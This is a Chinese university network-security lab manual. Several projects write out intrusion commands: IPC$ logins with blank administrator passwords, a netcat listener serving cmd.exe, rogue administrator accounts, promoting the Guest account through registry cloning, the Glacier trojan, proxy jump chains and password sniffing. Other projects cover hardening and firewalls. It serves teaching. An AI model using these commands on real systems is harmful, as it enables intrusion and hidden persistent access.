
项目二 网络基本命令的使用
项目三 扫描和网络监听
项目四 后门与木马
项目五 操作系统安全配置方案
项目六 防火墙技术
项目一 Vmware虚拟机及sniffer抓包软件的使用
一 实验目的
1、学会安装和使用vmware软件并能够熟练配置虚拟机。
2、学会使用sniffer软件抓取数据包。
二 实验设备
1、配置有vmware软件和sniffer软件的电脑多台。
2、局域网环境。
三 实验学时
4学时
四 实验内容
1、安装vmware虚拟机。
2、配置vmware虚拟机。
1)在虚拟机中装操作系统,选择菜单栏“File”下的“New”菜单项,再选择子菜单“New Virtual Machine”。
2)有两种选择,选项“Typical”是典型安装,选项“Custom”是自定义安装,我们选择“Custom”安装方式。点击按钮“下一步”。
3)进入选择操作系统界面,设置将来要安装的操作系统windows 2000 advanced sever. 点击按钮“下一步”.
4)选择虚拟机的内存大小,我们设置128M.点击下一步。
5)选择虚拟机的连网方式,我们设置为“Used Bridged networking”,点击“下一步”。
6)创建磁盘,我们选择Create a new virtual disk,点击下一步。
7)选择虚拟磁盘所要安装的目录,最后完成。
3、测试vmware虚拟机和局域网中其他电脑的连通性。
1)设置虚拟机的ip(与主机ip在同一网段)。
2)用ping命令测试虚拟机在局域网的连通性。
4、使用sniffer抓包
1)进入Sniffer主界面,抓包之前必须首先设置要抓取数据包的类型。选择主菜单Capture下的Define Filter菜单
2)在Address下拉列表中,选择抓包的类型是IP。
3)点击该窗口的Advanced选项卡,拖动滚动条找到IP项,将IP和ICMP选中。
4)主机的DOS窗口中Ping虚拟机,点击开始键,出现的窗口选择Decode选项卡,可以看到数据包在两台计算机间的传递过程。
五 实验小结
通过本次实验学生能够掌握vmware软件和sniffer软件的使用方法,为以后进一步学习打好基础。
六 注意事项
实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。
项目二 网络基本命令的使用
一 实验目的
1、理解并熟练掌握网络攻击和防御中常见的DOS命令。
2、掌握IPC$技术的攻击及防御的常用方法。
二 实验设备
1、连接到局域网的计算机多台。
2、应用软件:shutdown.exe(远程关机程序);nc.exe(“瑞士军刀”程序)。
三 实验学时
4学时
四 实验内容
1、利用DOS命令实现远程关机:
1)拷贝工具shutdown.exe到本机目录c:\\winnt\\system32下。
2)输入命令:ping 目标机ip,测试与目标机的是否连通。
3)用net命令进行远程连接:
net use \\\目标机ip\\ipc$ “password” /user:”username”(局域网内计算机用户id为:administrator,用户password为空).
4)输入远程重启计算机指令:
shutdown -r -m \\\目标机ip(命令:shutdown /?查询shutdown的使用方法)
2、利用nc.exe在远程电脑开启telnet服务:
1)利用net命令同远程电脑建立连接,方法同上。
2)使用copy命令将nc.exe拷贝到远程电脑的C:\\winnt\\system32目录下:
●net use \\\目标机ip\\ipc$ “password” /user:”username”
●copy \本机路径\\nc.exe \\\目标机ip\\admin$\\system32
3)利用at命令远程执行程序nc.exe开启telnet服务。
at \\\目标机IP time nc -l -p 99(指定端口) -t -e cmd.exe(命令:nc –h查询nc程序的使用方法)
4)利用目标机99端口telnet登陆远程电脑:
telnet 目标机ip 99
3、在远程电脑上新建文件。
4、在远程计算机上创建自己的管理员用户:
1)net user username /add
2)net localgroup administrators username /add
5、查看当前系统中的用户确认添加用户操作是否成功:
net user
6、删除本机ipc$共享:
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete…
7、查看端口操作:
使用命令netstat –an查看本机端口。
五 实验小结
通过本次实验同学们熟练掌握一些常用的网络命令,进一步理解了ipc$技术的漏洞和防御方法。
六 注意事项
实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。
项目三 扫描和网络监听
一、实验目的
掌握网络监听的工作机制和作用,学习常用的扫描和监听工具,如PortScan、WinSniffer和X-scan等程序的使用。
二、实验设备
1、连接到局域网的计算机多台
2、扫描和监听程序,如PortScan、WinSniffer和X-scan等。
三、实验学时
4学时
四、实验内容
实验需要两台计算机,可在主机的vmware中安装Windows2000Server来代替另一台计算机,并开放远程终端服务端口,在主机中安装扫描和监听程序,如PortScan、WinSniffer和X-scan等。
1、在主机的vmware中安装Windows2000Server,并开放远程终端服务端口,在主机中安装扫描和监听程序,如PortScan、WinSniffer和X-scan等。
2、使用扫描和网络监听程序对安装Windows2000Server的服务器进行监听并实现入侵。
1)使用PortScan对Windows2000Server的服务器进行端口扫描,在“Scan”文本框中输入IP地址,单击按钮“START”,开始扫描。
2)使用X-scan对Windows2000Server的服务器进行网络安全漏洞扫描。在“指定IP范围”中输入对方IP,并在“扫描模块”设置想要扫描的参数,设置完成后,点击“开始扫描”。
3)使用网络监听WinSniffer截取局域网内的密码。安装并打开WinSniffer,单击工具栏图标“Adapter”,设置网卡为本机物理网卡“Realtek RTL8139(A)”,单击“start”开始监听。使用DOS命令行连接远程的FTP服务,抓取密码。
五、实验总结
本次实验使学生掌握常用的扫描和监听工具,如PortScan、WinSniffer和X-scan等程序的使用方法。
六 注意事项
实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。
项目四 后门与木马
一 实验目的
区分木马与后门,掌握常用的后门设置方法,掌握木马冰河的使用、掌握如何设置网络代理跳板。
二 实验设备
1、连接到局域网的计算机多台
2、使用工具:RTCS.vbe、psu.exe、pulist.exe、djxyxs.exe、冰河V8.2、sksockserver.exe、SkServerGUI.exe、sc32r231.exe
三 实验学时
4学时
四 实验内容
1、利用工具RTCS.vbe可以远程开启对方的Telnet服务,使用该工具需要知道对方具有管理员权限的用户名和密码。命令的语法是:
“cscript RTCS.vbe 172.18.25.109 administrator 123456 1 23”。
2、利用工具软件psu.exe得到注册表键值的查看和编辑权。将psu.exe拷贝对方主机的C盘下,并在任务管理器查看对方主机winlogon.exe进程的ID号或者使用pulist.exe文件查看该进程的ID号,执行命令:
“psu -p regedit -i pid”其中pid为Winlogon.exe的进程号。在打开的注册表编辑器中将Guest(0x1f5)中的键值用Administrator(0x1f4)中的键值覆盖。在注册表中将Guest和0x1f5导出,删除,再重新导入。然后执行:
“net user guest (新密码) --修改guest帐户密码
net user guest /active:yes --开启guest帐户
net user guest /active:no --停止guest帐户
” OK!
3、将djxyxs.exe文件上传并拷贝到对方服务器的Winnt\emp目录下,执行,解压后执行解压出来的azzd.exe文件。该文件使服务器自动重启,使用终端服务连接软件(如mstsc.exe)登陆服务器。
4、使用“冰河”进行远程控制
win32.exe文件是服务器端程序,Y_Client.exe文件为客户端程序。将win32.exe文件在远程得计算机上执行以后,通过Y_Client.exe文件来控制远程得服务器。
5、首先将本地计算机设置为一级代理,将文件拷贝到C盘根目录下,然后将代理服务工具sksockserver.exe安装到主机上。执行步骤为:执行“sksockserver -install”将代理服务安装主机中,执行“sksockserver -config port 1122”将代理服务的端口设置为1122,当然可以设置为其他的数值,执行“sksockserver -config starttype 2”将该服务的启动方式设置为自动启动,执行“net start skserver”启动代理服务。
在网络上其他的主机上设置二级代理,使用本地代理配置工具:SkServerGUI.exe,在主菜单“配置”下的菜单项“经过的SKServer”设置参数。
安装sc32r231.exe,安装汉化HBC-SC32231-Ronnier.exe,然后执行该程序。
五 实验总结
通过本次实验使学生能够区分木马与后门,掌握远程开启对方的Telnet服、让禁用的Guest具有管理权限的方法、连接到终端服务的方法,并考虑其防御方法,掌握如何设置网络代理跳板。
六 注意事项
实验软件有一定的破坏性,有可能影响实验用计算机的正常运行。
项目五 操作系统安全配置方案
一 实验目的
1、掌握操作系统安全配置。
2、掌握操作系统的安全策略配置。
3、掌握操作系统安全信息通信配置。
二 实验设备
1、Windows2000操作系统。
2、局域网环境。
三 实验学时
4学时
四 实验内容
1、操作系统安全配置:
停止Guest帐号、用户数量、创建多个管理员帐号、管理员帐号改名、设置陷阱帐号、更改默认权限、管理员帐号设置安全密码、设置屏幕保护密码。
2、操作系统的安全策略配置:
关闭不必要的服务、关闭不必要的端口、开启审核策略、开启密码策略、开启帐户策略、备份敏感文件、不显示上次登陆名、禁止建立空连接、下载最新的补丁。
3、操作系统安全信息通信配置:
关闭DirectDraw、关闭默认共享、禁用Dump File、熟悉文件加密系统、加密Temp文件夹、锁住注册表、关机时清除文件、禁止软盘光盘启动、禁止判断主机类型、抵抗DDOS、禁止Guest访问日志、使用数据恢复软件恢复已丢失的数据。
五 实验小结
通过本次实验,能够基本掌握操作系统的初级、中级和高级配置。
六 注意事项
实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。
项目六 防火墙技术
一 实验目的
1、用WinRoute创建包过滤规则
2、用WinRoute禁用FTP访问
3、用WinRoute禁用HTTP访问
4、掌握入侵检测工具:BlackICE、冰之眼
二 实验设备
1、Windows操作系统。
2、WinRoute、BlackICE、冰之眼。
三 实验学时
4学时
四 实验内容
1、安装WinRoute
以管理员身份安装该软件,安装完毕后,启动“WinRoute Administration”。默认情况下,该密码为空。点击按钮“OK”,进入系统管理。当系统安装完毕以后,该主机就将不能上网,需要修改默认设置,点击工具栏图标,出现本地网络设置对话框,然后查看“Ethernet”的属性,将两个复选框全部选中。
2、用WinRoute创建包过滤规则
1)选择菜单项“Packet Filter”,选中网卡图标,单击按钮“添加”。出现过滤规则添加对话框,所有的过滤规则都在此处添加。
2)在协议下拉列表中选择“ICMP”,在“ICMP Type”栏目中,将复选框全部选中。在“Action”栏目中,选择单选框“Drop”。在“Log Packet”栏目中选中“Log into Window”,创建完毕后点击按钮“OK”,一条规则就创建完毕。
3)为了使设置的规则生效,点击按钮“应用”。
4)设置完毕,使用指令“Ping”来探测主机,将收不到回应,虽然主机没有响应,但是已经将事件记录到安全日志了。选择菜单栏“View”下的菜单项“Logs>Security Logs”,察看日志纪录。
3、用WinRoute禁用FTP访问
FTP服务用TCP协议, FTP占用TCP的21端口,主机的IP地址是“目的IP” ,首先利用WinRoute建立访问规则如表:
| 组序号 | 动作 | 源IP | 目的IP | 源端口 | 目的端口 | 协议类型 |
| 1 | 禁止 | * | “目的IP” | * | 21 | TCP |
访问违反了访问规则,会在主机的安全日志中记录下来。
4、用WinRoute禁用HTTP访问
HTTP服务用TCP协议,占用TCP协议的80端口,主机的IP地址是“目的IP” ,首先利用WinRoute建立访问规则如表:
| 组序号 | 动作 | 源IP | 目的IP | 源端口 | 目的端口 | 协议类型 |
| 1 | 禁止 | * | “目的IP” | * | 80 | TCP |
5、入侵检测工具:BlackICE。
6、入侵检测工具:冰之眼
五 实验小结
学会使用WinRoute创建包过滤规则、禁用FTP访问、HTTP访问,掌握入侵检测工具:BlackICE、冰之眼。
六 注意事项
实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。
